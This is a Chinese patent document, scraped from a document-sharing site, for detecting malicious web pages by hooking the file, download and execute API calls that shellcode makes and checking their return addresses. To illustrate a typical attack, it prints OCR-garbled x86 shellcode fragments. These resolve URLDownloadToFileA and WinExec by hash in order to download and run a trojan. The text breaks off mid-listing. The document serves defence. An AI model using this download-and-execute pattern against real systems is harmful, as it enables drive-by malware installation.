《检测恶意网页的方法及装置的制作方法》由会员分享,可在线阅读,更多相关《检测恶意网页的方法及装置的制作方法(6页珍藏版)》请在金锄头文库上搜索。
1、检测恶意网页的方法及装置的制作方法专利名称:检测恶意网页的方法及装置的制作方法技术领域:本发明涉及恶意网页检测技术领域,特别是涉及检测恶意网页的方法及装置。背景技术:随着计算机应用的日益普及,包括病毒、木马在内的恶意程序的数量也迅速增长,其中的木马程序是一类可以通过在用户的计算机上运行,进而窃取用户文件、隐私、账户等信息,有的甚至还可以让黑客远程控制用户电脑的恶意程序。相比较传统的单纯以破坏计算机设备为目的的病毒,木马对计算机用户的侵害行为更具有获取利益的目的性,其窃取信息的行为常常会给用户造成巨大的损失,因此木马程序的危害也更大。恶意程序可以通过很多传播途径来侵害用户的电脑,例如便携的移动介
2、质,如闪存盘,光盘等,而随着计算机网络技术的广泛应用,互联网逐渐成为恶意程序传播的主要途径之一,黑客或恶意程序传播者将木马等恶意程序文件伪装成其他类型文件,并引诱用户点击和下载,而恶意程序一旦被下载到用户计算机并成功运行,黑客或恶意程序传播者就可以利用这些恶意程序,进行破坏用户计算机,窃取用户个人信息等不法行为。利用操作系统以及应用软件的漏洞实施攻击,是使恶意程序在用户计算机上成功植入和运行的最主要手段之一。漏洞是指操作系统软件或应用软件在逻辑设计上的缺陷或在编写时产生的错误。这些缺陷或错误往往可以被黑客利用来植入木马等恶意程序,侵害或控制甚至破坏用户计算机软硬件系统,或者窃取用户的重要资料和
3、信息。漏洞问题会随着操作系统或应用软件的发布,以及用户的对操作系统或应用软件的深入研究和使用逐渐暴露出来。被发现的漏洞也会被操作系统或应用软件的提供者通过发布补丁软件等方式修补,或在以后发布的新版系统或软件升级中得以纠正。然而,在新版系统或应用软件纠正了旧版本中的漏洞的同时,也有可能会引入一些新的漏洞和错误;同时,对漏洞的修补在时间上具有一定的滞后性;以及实际应用中,漏洞补丁或者是新版系统或软件的安装并不能覆盖所有的用户,导致了现实的情况是,旧的系统漏洞不断消失,新的系统漏洞不断出现,系统漏洞和利用系统漏洞入侵用户计算机的问题也将长期存在。而随着互联网的发展,通过互联网传播的恶意程序与日俱增,
4、当用户点击恶意网页时,利用用户计算机的漏洞进行攻击,进而触发恶意代码的运行,已成为因此恶意程序传播的主要方式之一,因此迫切需要本领域技术人员解决的技术问题就在于,提供一种检测恶意网页的方法,能够有效的对利用系统漏洞攻击用户计算机,并向用户计算机植入并运行恶意程序的恶意网页进行检测,进而保护用户的计算机系统。发明内容本发明提供了检测恶意网页的方法及装置,能够有效的对利用系统漏洞攻击用户计算机,并向用户计算机植入并运行恶意程序的恶意网页进行检测,进而保护用户的计算机系统。本发明提供了如下方案、一种检测恶意网页的方法,包括对通过网页植入恶意程序以及运行恶意程序过程中可能调用的全部应用程序编程接口 A
5、PI函数进行监控;当监控到所述全部API函数中有API函数被调用时,对被调用API函数的运行状态信息进行检测,以便判断对所述被调用API函数的调用是否合法;如果存在不合法的API函数调用,则确定当前通过浏览器进程打开的网页中存在恶意网页。可选的,所述植入恶意程序以及运行恶意程序过程中可能调用的全部应用程序编程接口 API函数包括恶意指令代码Shellcode在植入恶意程序以及运行恶意程序过程中可能调用的全部API函数。可选的,所述植入恶意程序以及运行恶意程序过程中可能调用的全部API函数包括文件操作类API函数、网络请求下载类API函数以及执行命令类API函数。可选的,所述当监控到所述API函
6、数被调用时,对所述API的运行状态信息进行检测,以便判断所述API函数的调用是否合法,包括当监控到所述API函数被调用时,检测所述API函数的返回地址内存页属性,如果所述API函数的返回地址内存页属性为不可执行属性,则判定所述API函数的调用不合法。可选的,所述当监控到所述API函数被调用时,对所述API的运行状态信息进行检测,以便判断所述API函数的调用是否合法,包括当监控到所述API函数被调用时,检测所述API函数的返回地址是否在所属模块的加载范围,如果所述API函数的返回地址不在所属模块的加载范围,则判定所述API函数的调用不合法。可选的,所述对植入恶意程序以及运行恶意程序过程中可能调用
7、的全部API函数进行监控,包括对植入恶意程序以及运行恶意程序过程中可能调用的不同版本的全部API函数进行监控。可选的,还包括在确定当前通过浏览器进程打开的网页中存在恶意网页后,提示用户系统存在安全风险,需要终止浏览器进程,以便阻断恶意网页的恶意行为。可选的,还包括在确定当前通过浏览器进程打开的网页中存在恶意网页后,结束浏览器进程,以便阻断恶意网页的恶意行为。一种检测恶意网页的装置,包括监控单元,用于对通过网页植入恶意程序以及运行恶意程序过程中可能调用的全部应用程序编程接口 API函数进行监控;检测单元,用于当监控到所述全部API函数中有API函数被调用时,对被调用API函数的运行状态信息进行检
8、测,以便判断对所述被调用API函数的调用是否合法;确定单元,用于如果存在不合法的API函数调用,则确定当前通过浏览器进程打开的网页中存在恶意网页。可选的,所述监控单元具体用于对恶意指令代码Shellcode在植入恶意程序以及运行恶意程序过程中可能调用的全部API函数进行监控。可选的,所述植入恶意程序以及运行恶意程序过程中可能调用的全部API函数包括文件操作类API函数、网络请求下载类API函数以及执行命令类API函数。可选的,所述检测单元,包括第一检测子单元,用于当监控到所述API函数被调用时,检测所述API函数的返回地址内存页属性,如果所述API函数的返回地址内存页属性为不可执行属性,则判定
9、所述API函数的调用不合法。可选的,所述检测单元,包括 第二检测子单元,用于当监控到所述API函数被调用时,检测所述API函数的返回地址是否在所属模块的加载范围,如果所述API函数的返回地址不在所属模块的加载范围,则判定所述API函数的调用不合法。可选的,所述监控单元具体用于对植入恶意程序以及运行恶意程序过程中可能调用的不同版本的全部API函数进行监控。可选的,还包括提示单元,用于在确定当前通过浏览器进程打开的网页中存在恶意网页后,提示用户系统存在安全风险,需要终止浏览器进程,以便阻断恶意网页的恶意行为。可选的,还包括结束进程单元,用于在确定当前通过浏览器进程打开的网页中存在恶意网页后,结束浏
10、览器进程,以便阻断恶意网页的恶意行为。根据本发明提供的具体实施例,本发明公开了以下技术效果通过本发明,可以对植入恶意程序以及运行恶意程序过程中可能调用的全部应用程序编程接口 API函数进行监控;通过较全面的API函数监控,降低了遭到攻击的可能。进一步的,当监控到API函数被调用时,通过对被调用API函数的运行状态信息进行检测,可以判断出该API函数的调用是否合法;如果存在不合法的API函数调用,则确定当前打开的网页中存在恶意网页。通过本发明,可以有效的对利用系统漏洞攻击用户计算机,并向用户计算机植入并运行恶意程序的恶意网页进行检测,进而保护用户的计算机系统。为了更清楚地说明本发明实施例或现有技
11、术中的技术方案,下面将对实施例中所需要使用的附图作简单地介绍,显而易见地,下面描述中的附图仅仅是本发明的一些实施例,对于本领域普通技术人员来讲,在不付出创造性劳动的前提下,还可以根据这些附图获得其他的附图。图I是本发明实施例提供的方法的流程图;图2是本发明实施例提供的装置的示意图。具体实施例方式下面将结合本发明实施例中的附图,对本发明实施例中的技术方案进行清楚、完整地描述,显然,所描述的实施例仅仅是本发明一部分实施例,而不是全部的实施例。基于本发明中的实施例,本领域普通技术人员所获得的所有其他实施例,都属于本发明保护的范围。下面就对本发明实施例提供的检测网页木马的方法进行详细的介绍,参见图1,
12、该方法可以包括以下步骤SlOl :对通过网页植入恶意程序以 及运行恶意程序过程中可能调用的全部应用程序编程接口 API函数进行监控;在对操作系统或应用软件的漏洞的发现和修复的过程中,由于漏洞修复的滞后性,以及无法及时覆盖所有的用户,网络上总会有相当数量的存在漏洞的计算机在运行着,这就给了恶意程序的入侵以可乘之机。在互联网高速发展的今天,使用互联网浏览网页的用户越来越多,通过网页进行木马传播,逐渐成了恶意程序传播的主要途径。一个典型的利用系统漏洞或应用软件漏洞进行攻击进而植入和运行恶意程序的过程如下当用户访问了黑客制作的恶意网页,并执行了网页中的脚本时,Shellcode中的代码将会通过脚本操作
13、被写入到浏览器程序的堆内存中,此时,再通过针对系统或应用软件的漏洞的攻击,尤其是针对缓冲区溢出漏洞的攻击,造成程序执行流程跳转,从而使程序执行跳转到Shellcode所在的内存空间,并执行Shellcode中的代码,进而通过执行Shellcode代码完成植入和运行恶意程序。Shellcode是一段可执行的CPU指令代码,或者称为机器代码,由于Shellcode经常是由黑客编写出来用于实施攻击目的,所以Shellcode也常被称为恶意指令代码。在利用系统漏洞或应用软件漏洞成功实施缓冲区溢出攻击后,Shellcode会获得执行权限,进而执行其内存空间中的指令代码。Shellcode包含的指令代码可
14、以根据编写者的意图完成许多任务,当被黑客用于实施攻击时,一种用途就是被用来通过网络下载和在目标计算机上执行黑客预先准备好的恶意程序,如木马程序等。而为了要实现Shellcode的“小规模化”和更好的隐蔽性,Shellcode通常会编写为一段数量很小的代码,当要实现较为复杂的功能,比如植入和运行木马,通常是通过查找和调用系统中相关功能的API来实现的。一个典型的攻击过程示例如在成功针对某一系统或应用软件漏洞进行攻击后,Shellcode获得执行权限,通过以下Shellcode指令代码调用系统网络下载API函数,将恶意程序文件通过网络下载到本地计算机,该过程的Shellcode代码如下所示 pus
15、h 0x702fla36 ; URLDownloadToFileA hash push eax; urlmon.dll base address call find_function xor ecx, ecx; ecx = 0 for later usepush ecx; IpfnCB push ecx; dwReserved lea esi, edi + 21 ; Path is edi + start_of_fiIename mov edi + 26, Cl; Eliminate the Oxff push esi; szFileName lea edx, edi push edx; sz
16、URL push ecx; pCallercall eax; eax holds our function address执行以上这段Shellcode相当于执行了以下API函数的调用语句URLDownloadToFile (NULL, C: muma.exe , 0, NULL)上述代码的执行的结果,即通过调用API函数URLDownloadToFile完成了对木马文件“muma. exe”的下载,然后攻击者可以通过下面的Shellcode代码调用系统的执行命令类API函数,来运行已经下载到本地计算机的恶意程序文件 push OxOeBafe98 ; WinExec hash push ebx; kerne!32 base address call find_function; find address inc ecx; ecx = I push ecx
